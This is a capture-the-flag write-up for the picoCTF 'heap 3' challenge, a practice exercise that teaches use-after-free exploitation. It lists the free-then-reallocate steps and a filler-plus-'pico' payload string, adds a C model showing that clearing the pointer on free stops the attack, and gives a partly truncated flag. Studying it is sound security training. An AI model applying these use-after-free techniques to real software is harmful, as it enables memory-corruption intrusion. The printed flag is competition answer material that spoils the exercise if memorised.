heap 3

Published: April 3, 2024
Updated: December 9, 2025

Description

This program mishandles memory. Can you exploit it to get the flag?

Local + remote

Download chall and chall.c for local analysis.

Connect to tethys.picoctf.net <PORT_FROM_INSTANCE> to interact with the menu.

wget https://artifacts.picoctf.net/c_tethys/6/chall && \
chmod +x chall && \
wget https://artifacts.picoctf.net/c_tethys/6/chall.c && \
nc tethys.picoctf.net <PORT_FROM_INSTANCE>

Solution

This is the final heap challenge in the series. After progressing through heap 0 (basic overflow), heap 1 (specific value), and heap 2 (function pointers), you now exploit use-after-free vulnerabilities. The menu offers:
  2. Allocate heap object (controlled length).
  3. Print current x value.
  4. Check for win (requires x == "pico").
  5. Free x (this sets up the use-after-free).

  1. Free the chunk first
    Option 5 must run before anything else so the program continues to use a dangling pointer to x.
  2. Allocate with controlled data
    Option 2 asks for a length. Enter 31 so you can write 30 filler characters followed by pico, which overwrites the freed structure.
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAApico
  3. Verify and print
    Option 3 now echoes pico, and option 4 prints the flag because the dangling pointer points to your crafted data.
    If the check fails, ensure you freed first and used exactly 30 filler characters before pico.
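
The steps above work because the program keeps using x after option 5 has freed it. The C model below is an added example, not code from chall.c: the object layout, the one-slot pool (pool_alloc, pool_free) and run_sequence are assumptions made for illustration. It replays the free, allocate, check sequence once with the dangling pointer kept and once with the pointer cleared on free.

```c
#include <stdio.h>
#include <string.h>

/* Assumed layout (not taken from chall.c): 30 bytes precede the checked
   field, matching the 30 filler characters in the steps above. */
typedef struct { char pad[30]; char flag[5]; } object;

/* Hypothetical one-slot pool modelling an allocator that hands a freed
   chunk straight back to the next request of the same size. */
static object slot;
static int slot_in_use;
static void *pool_alloc(void) {
    if (slot_in_use) return NULL;
    slot_in_use = 1;
    return &slot;
}
static void pool_free(void *p) { if (p == (void *)&slot) slot_in_use = 0; }

/* Win check that fails closed when the pointer has been cleared. */
static int check_win(const object *x) { return x && strcmp(x->flag, "pico") == 0; }

/* Replays free -> allocate -> write -> check. With null_after_free set,
   the pointer is cleared on free (the hardened variant). Returns 1 on win. */
int run_sequence(int null_after_free, const char *input) {
    slot_in_use = 0;
    object *x = pool_alloc();
    memset(x, 0, sizeof *x);
    strcpy(x->flag, "none");             /* constructed initial value */

    pool_free(x);                        /* option 5: x now dangles */
    if (null_after_free) x = NULL;       /* fix: drop the stale pointer */
    char *buf = pool_alloc();            /* option 2: same memory returned */
    size_t n = strlen(input);
    if (n > sizeof(object) - 1) n = sizeof(object) - 1;  /* bounded copy */
    memset(buf, 0, sizeof(object));
    memcpy(buf, input, n);
    int win = check_win(x);              /* option 4 */
    pool_free(buf);
    return win;
}

int main(void) {
    char payload[35];
    memset(payload, 'A', 30);            /* 30 filler bytes, then "pico" */
    strcpy(payload + 30, "pico");
    printf("dangling pointer kept:  win=%d\n", run_sequence(0, payload));
    printf("pointer nulled on free: win=%d\n", run_sequence(1, payload));
    return 0;
}
```

Clearing the pointer at the free site and checking for NULL before every later use is what turns the reused memory from a win condition into a rejected request.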

Flag

picoCTF{now_thats_free_real_estate_a11...}

Once the freed chunk is reallocated with pico, the win check passes and prints the flag.